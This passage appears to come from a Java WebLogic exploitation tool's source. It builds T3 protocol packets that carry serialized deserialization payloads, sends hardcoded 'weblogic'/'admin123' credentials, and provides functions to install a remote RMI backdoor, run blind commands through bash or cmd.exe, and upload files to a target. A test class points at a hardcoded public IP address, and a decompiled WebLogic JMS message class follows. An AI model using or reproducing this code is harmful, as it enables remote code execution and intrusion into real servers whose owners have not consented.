ObjectInputStream objectInputStream = new ObjectInputStream(bis);
objectInputStream.readObject();
}
}
================================================
FILE: src/com/supeream/weblogic/T3ProtocolOperation.java
================================================
package com.supeream.weblogic;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import com.supeream.Main;
import com.supeream.serial.BytesOperation;
import com.supeream.serial.Serializables;
import com.supeream.ssl.SocketFactory;
import weblogic.rjvm.JVMID;
import weblogic.security.acl.internal.AuthenticatedUser;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.Socket;
public class T3ProtocolOperation {
public static void send(String host, String port, byte[] payload) throws Exception {
Socket s = SocketFactory.newSocket(host, Integer.parseInt(port));
//AS ABBREV_TABLE_SIZE HL remoteHeaderLength 用来做skip的
String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
if (Main.cmdLine.hasOption("https")) {
header = "t3s 7.0.0.0\nAS:10\nHL:19\n\n";
}
s.getOutputStream().write(header.getBytes());
s.getOutputStream().flush();
BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
String versionInfo = br.readLine();
if (Main.version == null) {
versionInfo = versionInfo.replace("HELO:", "");
versionInfo = versionInfo.replace(".false", "");
System.out.println("weblogic version:" + versionInfo);
Main.version = versionInfo;
}
// String asInfo = br.readLine();
// String hlInfo = br.readLine();
// System.out.println(versionInfo+"\n"+asInfo+"\n"+hlInfo);
//cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
//t3 protocol
String cmd = "08";
String qos = "65";
String flags = "01";
String responseId = "ffffffff";
String invokableId = "ffffffff";
String abbrevOffset = "00000000";
String countLength = "01";
String capacityLength = "10";//必须大于上面设置的AS值
String readObjectType = "00";//00 object deserial 01 ascii
StringBuilder datas = new StringBuilder();
datas.append(cmd);
datas.append(qos);
datas.append(flags);
datas.append(responseId);
datas.append(invokableId);
datas.append(abbrevOffset);
//because of 2 times deserial
countLength = "04";
datas.append(countLength);
//define execute operation
String pahse1Str = BytesOperation.bytesToHexString(payload);
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(pahse1Str);
//for compatiable fo hide
//for compatiable fo hide
AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123");
String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser));
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(phase4);
JVMID src = new JVMID();
Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
constructor.setAccessible(true);
src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
Field serverName = src.getClass().getDeclaredField("differentiator");
serverName.setAccessible(true);
serverName.set(src,1);
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(BytesOperation.bytesToHexString(Serializables.serialize(src)));
JVMID dst = new JVMID();
constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
constructor.setAccessible(true);
src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
serverName = src.getClass().getDeclaredField("differentiator");
serverName.setAccessible(true);
serverName.set(dst,1);
datas.append(capacityLength);
datas.append(readObjectType);
datas.append(BytesOperation.bytesToHexString(Serializables.serialize(dst)));
byte[] headers = BytesOperation.hexStringToBytes(datas.toString());
int len = headers.length + 4;
String hexLen = Integer.toHexString(len);
StringBuilder dataLen = new StringBuilder();
if (hexLen.length() < 8) {
for (int i = 0; i < (8 - hexLen.length()); i++) {
dataLen.append("0");
}
}
dataLen.append(hexLen);
s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + datas.toString()));
s.getOutputStream().flush();
s.close();
}
}
================================================
FILE: src/com/supeream/weblogic/T3Test.java
================================================
package com.supeream.weblogic;
import com.supeream.Main;
import com.supeream.payload.RemoteImpl;
import com.supeream.serial.BytesOperation;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
import com.supeream.ssl.SocketFactory;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.DefaultParser;
import org.apache.commons.cli.Options;
import weblogic.apache.org.apache.velocity.runtime.Runtime;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.internal.NamingNode;
import weblogic.protocol.Identity;
import weblogic.rjvm.JVMID;
import weblogic.rmi.cluster.ClusterableRemoteObject;
import weblogic.rmi.cluster.ReplicaAwareRemoteObject;
import weblogic.security.acl.internal.AuthenticatedUser;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingEnumeration;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.Socket;
import java.rmi.Remote;
/**
* Created by nike on 17/6/28.
*/
public class T3Test {
public static void main(String[] args) throws Exception {
// Options options = new Options();
// options.addOption("https",false,"xx");
// CommandLineParser parser = new DefaultParser();
// Main.cmdLine = parser.parse(options, args);
//
// Socket s = SocketFactory.newSocket("77.246.34.226", 443);
// //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 用来做skip的
// String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
// s.getOutputStream().write(header.getBytes());
// s.getOutputStream().flush();
// BufferedReader br = new BufferedReader(new InputStreamReader(s.getInputStream()));
// String versionInfo = br.readLine();
// String asInfo = br.readLine();
// String hlInfo = br.readLine();
//
// System.out.println(versionInfo + "\n" + asInfo + "\n" + hlInfo);
//
// //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
//
//
// //t3 protocol
// String cmd = "09";
// String qos = "65";
// String flags = "01";
// String responseId = "ffffffff";
// String invokableId = "ffffffff";
// String abbrevOffset = "00000022";//16+3=19+4+4+1=28+1+1+5348=5378-4=000014fe 30+8-4
//
//
// String countLength = "02";
// String capacityLength = "10";//必须大于上面设置的AS值
// String readObjectType = "00";//00 object deserial 01 ascii
//
// StringBuilder dataS = new StringBuilder();
// dataS.append(cmd);
// dataS.append(qos);
// dataS.append(flags);
// dataS.append(responseId);
// dataS.append(invokableId);
// dataS.append(abbrevOffset);
//
// //RemotePeriodLength
// dataS.append("00000001");
// //PublickeySize
// dataS.append("00000001");
// System.out.println(Integer.toHexString(115));
// dataS.append("0001");
//
// byte[] phase1 = Serializables.serialize(new File("/etc/passwd"));
// System.out.println("payloadlength="+(phase1.length));
// String pahse1Str = BytesOperation.bytesToHexString(phase1);
// System.out.println("pahse1Str="+pahse1Str);
// dataS.append(pahse1Str.substring(8));
//
// countLength = "04";
// dataS.append(countLength);
//
//
// //define IRemote.class class by byte[]
//// byte[] phase1 = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
//// String pahse1Str = BytesOperation.bytesToHexString(phase1);
//// datas.append(capacityLength);
//// datas.append(readObjectType);
//// datas.append(pahse1Str);
//
//
//
// //for compatiable fo hide
// Class x = Class.forName("weblogic.rjvm.ClassTableEntry");
//
// Class xxf = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
// ObjectStreamClass objectStreamClass = ObjectStreamClass.lookup(xxf);
// Constructor f = x.getDeclaredConstructor(ObjectStreamClass.class, String.class);
//
// f.setAccessible(true);
// Object xx = f.newInstance(objectStreamClass,"");
//
// String phase41 = BytesOperation.bytesToHexString(Serializables.serialize(xx));
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(phase41);
//
//
// //for compatiable fo hide
// AuthenticatedUser authenticatedUser = new AuthenticatedUser("weblogic", "admin123");
// String phase4 = BytesOperation.bytesToHexString(Serializables.serialize(authenticatedUser));
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(phase4);
//
// JVMID dst = new JVMID();
//
// Constructor constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
// constructor.setAccessible(true);
// dst = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
// Field serverName = dst.getClass().getDeclaredField("differentiator");
// serverName.setAccessible(true);
// serverName.set(dst,0);
//
// serverName = dst.getClass().getDeclaredField("transientIdentity");
// serverName.setAccessible(true);
// serverName.set(dst,new Identity(1000l));
//
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(dst)));
//
// JVMID src = new JVMID();
//
// constructor = JVMID.class.getDeclaredConstructor(java.net.InetAddress.class,boolean.class);
// constructor.setAccessible(true);
// src = (JVMID)constructor.newInstance(InetAddress.getByName("127.0.0.1"),false);
// serverName = src.getClass().getDeclaredField("differentiator");
// serverName.setAccessible(true);
// serverName.set(dst,0);
//
// serverName = src.getClass().getDeclaredField("transientIdentity");
// serverName.setAccessible(true);
// serverName.set(src,new Identity(1000l));
//
// dataS.append(capacityLength);
// dataS.append(readObjectType);
// dataS.append(BytesOperation.bytesToHexString(Serializables.serialize(src)));
//
//
//
//// RemotePeriodLength
// int remotePeriodLength = Integer.MAX_VALUE;
// ByteArrayOutputStream bos = new ByteArrayOutputStream();
// DataOutputStream dos = new DataOutputStream(bos);
// dos.writeInt(remotePeriodLength);
// dos.flush();
// dos.close();
// System.out.println(BytesOperation.bytesToHexString(bos.toByteArray()));
//
// System.out.println(dataS.toString());
//
// byte[] headers = BytesOperation.hexStringToBytes(dataS.toString());
//
//
// int len = headers.length + 4;
// String hexLen = Integer.toHexString(len);
//
// StringBuilder dataLen = new StringBuilder();
// if (hexLen.length() < 8) {
// for (int i = 0; i < (8 - hexLen.length()); i++) {
// dataLen.append("0");
// }
// }
//
// dataLen.append(hexLen);
// System.out.println("length="+dataLen);
//
// s.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + dataS.toString()));
// s.getOutputStream().flush();
//
// System.out.println("result="+br.readLine());
// s.close();
System.setProperty("weblogic.rjvm.enableprotocolswitch","true");
System.setProperty("UseSunHttpHandler","true");
System.setProperty("ssl.SocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl");
System.setProperty("ssl.ServerSocketFactory.provider" , "sun.security.ssl.SSLSocketFactoryImpl");
Context initialContext = Main.getInitialContext("t3s://" + "77.246.34.226" + ":" + 443);
// Context initialContext = Main.getInitialContext("t3://" + "10.211.55.5" + ":" + 7001);
// NamingNode remote = (NamingNode) initialContext.lookup("weblogic");
// System.out.println(remote.toString());
// System.out.println(initialContext.);
System.out.println(initialContext.getEnvironment());
NamingEnumeration namingEnumeration = initialContext.list("");
while (namingEnumeration.hasMoreElements()) {
System.out.println(namingEnumeration.next().getClass().getName());
}
// weblogic.jndi.internal.WLContextImpl serverNamingNode = (weblogic.jndi.internal.WLContextImpl) initialContext.lookup("weblogic");
}
}
================================================
FILE: src/com/supeream/weblogic/WebLogicOperation.java
================================================
package com.supeream.weblogic;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import com.supeream.Main;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
public class WebLogicOperation {
public static void installRmi(String host, String port) throws Exception {
byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"});
T3ProtocolOperation.send(host, port, payload);
}
public static void unInstallRmi(String host, String port) throws Exception {
byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"});
T3ProtocolOperation.send(host, port, payload);
}
public static void blind(String host, String port) throws Exception {
byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")});
T3ProtocolOperation.send(host, port, payload);
}
public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception {
byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content);
T3ProtocolOperation.send(host, port, payload);
}
public static void blindExecute(String host, String port, String cmd) throws Exception {
String[] cmds = new String[]{cmd};
if (Main.cmdLine.hasOption("os")) {
if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) {
cmds = new String[]{"/bin/bash", "-c", cmd};
} else {
cmds = new String[]{"cmd.exe", "/c", cmd};
}
}
byte[] payload = SerialDataGenerator.serialBlindDatas(cmds);
T3ProtocolOperation.send(host, port, payload);
}
}
================================================
FILE: src/weblogic/jms/common/StreamMessageImpl.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.jms.common;
import weblogic.jms.JMSClientExceptionLogger;
import javax.jms.Destination;
import javax.jms.JMSException;
import javax.jms.MessageEOFException;
import javax.jms.MessageNotWriteableException;
import javax.jms.*;
import java.io.*;
public final class StreamMessageImpl extends MessageImpl implements StreamMessage, Externalizable {
static final long serialVersionUID = 7748687583664395357L;
private static final byte EXTVERSION1 = 1;
private static final byte EXTVERSION2 = 2;
private static final byte EXTVERSION3 = 3;
private static final byte VERSIONMASK = 127;
private static final byte UNKNOWN_TYPECODE = 0;
private static final byte BOOLEAN_TYPE = 1;
private static final byte BYTE_TYPE = 2;
private static final byte CHAR_TYPE = 3;
private static final byte DOUBLE_TYPE = 4;
private static final byte FLOAT_TYPE = 5;
private static final byte INT_TYPE = 6;
private static final byte LONG_TYPE = 7;
private static final byte SHORT_TYPE = 8;
private static final byte STRING_UTF_TYPE = 9;
private static final byte STRING_UTF32_TYPE = 10;
private static final byte BYTES_TYPE = 11;
private static final byte NULL_TYPE = 12;
private static final String[] TYPE_CODE_STRINGS = new String[]{"invalid type code", "boolean", "byte", "char", "double", "float", "integer", "long", "short", "String", "String", "byte array", "null object"};
private static final String ERROR_MSG_SEGMENT = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
private boolean readingByteArray;
private int available_bytes;
private transient byte[] buffer;
private transient int length;
private transient boolean copyOnWrite;
private transient BufferDataOutputStream bdos;
private transient BufferDataInputStream bdis;
public StreamMessageImpl() {
}
public StreamMessageImpl(StreamMessage var1) throws IOException, JMSException {
this(var1, (Destination) null, (Destination) null);
}
public StreamMessageImpl(StreamMessage var1, Destination var2, Destination var3) throws IOException, JMSException {
super(var1, var2, var3);
if (!(var1 instanceof StreamMessageImpl)) {
var1.reset();
}
try {
while (true) {
this.writeObject(var1.readObject());
}
} catch (MessageEOFException var5) {
this.reset();
this.setPropertiesWritable(false);
}
}
public byte getType() {
return 5;
}
public void nullBody() {
this.length = 0;
this.buffer = null;
this.copyOnWrite = false;
this.bdis = null;
this.bdos = null;
this.readingByteArray = false;
this.available_bytes = 0;
}
private void putTypeBack() {
if (!this.readingByteArray) {
this.bdis.unput();
}
}
private String readPastEnd() {
return JMSClientExceptionLogger.logReadPastEndLoggable().getMessage();
}
private String streamReadError() {
return JMSClientExceptionLogger.logStreamReadErrorLoggable().getMessage();
}
private String streamWriteError() {
return JMSClientExceptionLogger.logStreamWriteErrorLoggable().getMessage();
}
private String streamConversionError(String var1, String var2) {
return JMSClientExceptionLogger.logConversionErrorLoggable(var1, var2).getMessage();
}
private byte readType() throws JMSException {
this.decompressMessageBody();
this.checkReadable();
if (this.readingByteArray) {
return 11;
} else {
try {
return this.bdis.readByte();
} catch (EOFException var2) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var2);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var3);
}
}
}
private void writeType(byte var1) throws JMSException {
this.checkWritable();
try {
this.bdos.writeByte(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamWriteErrorLoggable().getMessage(), var3);
}
}
public boolean readBoolean() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 1:
return this.bdis.readBoolean();
case 9:
case 10:
return Boolean.valueOf(this.readStringInternal(var1)).booleanValue();
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(1)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
}
}
public byte readByte() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return this.bdis.readByte();
case 9:
case 10:
this.bdis.mark();
return Byte.parseByte(this.readStringInternal(var1));
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(2)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public short readShort() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return (short) this.bdis.readByte();
case 3:
case 4:
case 5:
case 6:
case 7:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(8)) + var2);
case 8:
return this.bdis.readShort();
case 9:
case 10:
this.bdis.mark();
return Short.parseShort(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public char readChar() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 3:
return this.bdis.readChar();
case 12:
this.putTypeBack();
throw new NullPointerException();
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(3)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
}
}
public int readInt() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return this.bdis.readByte();
case 3:
case 4:
case 5:
case 7:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(6)) + var2);
case 6:
return this.bdis.readInt();
case 8:
return this.bdis.readShort();
case 9:
case 10:
this.bdis.mark();
return Integer.parseInt(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public long readLong() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 2:
return (long) this.bdis.readByte();
case 3:
case 4:
case 5:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(7)) + var2);
case 6:
return (long) this.bdis.readInt();
case 7:
return this.bdis.readLong();
case 8:
return (long) this.bdis.readShort();
case 9:
case 10:
this.bdis.mark();
return Long.parseLong(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public float readFloat() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 5:
return this.bdis.readFloat();
case 9:
case 10:
this.bdis.mark();
return Float.parseFloat(this.readStringInternal(var1));
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(5)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public double readDouble() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 4:
return this.bdis.readDouble();
case 5:
return (double) this.bdis.readFloat();
case 6:
case 7:
case 8:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(4)) + var2);
case 9:
case 10:
this.bdis.mark();
return Double.parseDouble(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public String readString() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 1:
return String.valueOf(this.bdis.readBoolean());
case 2:
return String.valueOf(this.bdis.readByte());
case 3:
return String.valueOf(this.bdis.readChar());
case 4:
return String.valueOf(this.bdis.readDouble());
case 5:
return String.valueOf(this.bdis.readFloat());
case 6:
return String.valueOf(this.bdis.readInt());
case 7:
return String.valueOf(this.bdis.readLong());
case 8:
return String.valueOf(this.bdis.readShort());
case 9:
return this.readStringInternal(var1);
case 10:
return this.readStringInternal(var1);
case 11:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(9)) + var2);
case 12:
return null;
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
}
}
public int readBytes(byte[] var1) throws JMSException {
boolean var3 = true;
if (var1 == null) {
throw new NullPointerException();
} else {
try {
if (!this.readingByteArray) {
byte var2;
if ((var2 = this.readType()) != 11) {
if (var2 == 12) {
return -1;
}
this.bdis.unput();
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var2), this.typeCodeToString(11)));
}
this.available_bytes = this.bdis.readInt();
if (this.available_bytes == 0) {
return 0;
}
this.readingByteArray = true;
}
if (this.available_bytes == 0) {
this.readingByteArray = false;
return -1;
} else {
int var9;
if (var1.length > this.available_bytes) {
var9 = this.bdis.read(var1, 0, this.available_bytes);
this.readingByteArray = false;
} else {
var9 = this.bdis.read(var1, 0, var1.length);
this.available_bytes -= var1.length;
}
return var9;
}
} catch (EOFException var5) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var5);
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var6);
} catch (ArrayIndexOutOfBoundsException var7) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamReadErrorIndexLoggable().getMessage(), var7);
} catch (ArrayStoreException var8) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamReadErrorStoreLoggable().getMessage(), var8);
}
}
}
public Object readObject() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 1:
return new Boolean(this.bdis.readBoolean());
case 2:
return new Byte(this.bdis.readByte());
case 3:
return new Character(this.bdis.readChar());
case 4:
return new Double(this.bdis.readDouble());
case 5:
return new Float(this.bdis.readFloat());
case 6:
return new Integer(this.bdis.readInt());
case 7:
return new Long(this.bdis.readLong());
case 8:
return new Short(this.bdis.readShort());
case 9:
return this.readStringInternal(var1);
case 10:
return this.readStringInternal(var1);
case 11:
if (this.readingByteArray) {
throw new MessageFormatException("Can not read next data. Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage");
} else {
int var2 = this.bdis.readInt();
byte[] var3 = new byte[var2];
int var4 = this.bdis.read(var3, 0, var2);
if (var4 != var2) {
throw new EOFException("");
}
return var3;
}
case 12:
return null;
default:
this.bdis.unput();
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), "Object"));
}
} catch (EOFException var5) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var5);
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var6);
}
}
public void writeBoolean(boolean var1) throws JMSException {
this.writeType((byte) 1);
try {
this.bdos.writeBoolean(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeByte(byte var1) throws JMSException {
this.writeType((byte) 2);
try {
this.bdos.writeByte(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeShort(short var1) throws JMSException {
this.writeType((byte) 8);
try {
this.bdos.writeShort(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeChar(char var1) throws JMSException {
this.writeType((byte) 3);
try {
this.bdos.writeChar(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeInt(int var1) throws JMSException {
this.writeType((byte) 6);
try {
this.bdos.writeInt(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeLong(long var1) throws JMSException {
this.writeType((byte) 7);
try {
this.bdos.writeLong(var1);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var4);
}
}
public void writeFloat(float var1) throws JMSException {
this.writeType((byte) 5);
try {
this.bdos.writeFloat(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeDouble(double var1) throws JMSException {
this.writeType((byte) 4);
try {
this.bdos.writeDouble(var1);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var4);
}
}
public void writeString(String var1) throws JMSException {
if (var1 == null) {
this.writeType((byte) 12);
} else {
try {
this.writeStringInternal(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
}
public void writeBytes(byte[] var1) throws JMSException {
this.writeBytes(var1, 0, var1.length);
}
public void writeBytes(byte[] var1, int var2, int var3) throws JMSException {
if (var1 == null) {
throw new NullPointerException();
} else {
this.writeType((byte) 11);
try {
this.bdos.writeInt(var3);
this.bdos.write(var1, var2, var3);
} catch (IOException var5) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var5);
}
}
}
public void writeObject(Object var1) throws JMSException {
if (var1 instanceof Boolean) {
this.writeBoolean(((Boolean) var1).booleanValue());
} else if (var1 instanceof Number) {
if (var1 instanceof Byte) {
this.writeByte(((Byte) var1).byteValue());
} else if (var1 instanceof Double) {
this.writeDouble(((Double) var1).doubleValue());
} else if (var1 instanceof Float) {
this.writeFloat(((Float) var1).floatValue());
} else if (var1 instanceof Integer) {
this.writeInt(((Integer) var1).intValue());
} else if (var1 instanceof Long) {
this.writeLong(((Long) var1).longValue());
} else if (var1 instanceof Short) {
this.writeShort(((Short) var1).shortValue());
}
} else if (var1 instanceof Character) {
this.writeChar(((Character) var1).charValue());
} else if (var1 instanceof String) {
this.writeString((String) var1);
} else if (var1 instanceof byte[]) {
this.writeBytes((byte[]) ((byte[]) var1));
} else {
if (var1 != null) {
throw new MessageFormatException("Invalid Type: " + var1.getClass().getName());
}
this.writeType((byte) 12);
}
}
public void reset() throws JMSException {
this.setBodyWritable(false);
if (this.bdis != null) {
this.bdis.reset();
} else if (this.bdos != null) {
this.buffer = this.bdos.getBuffer();
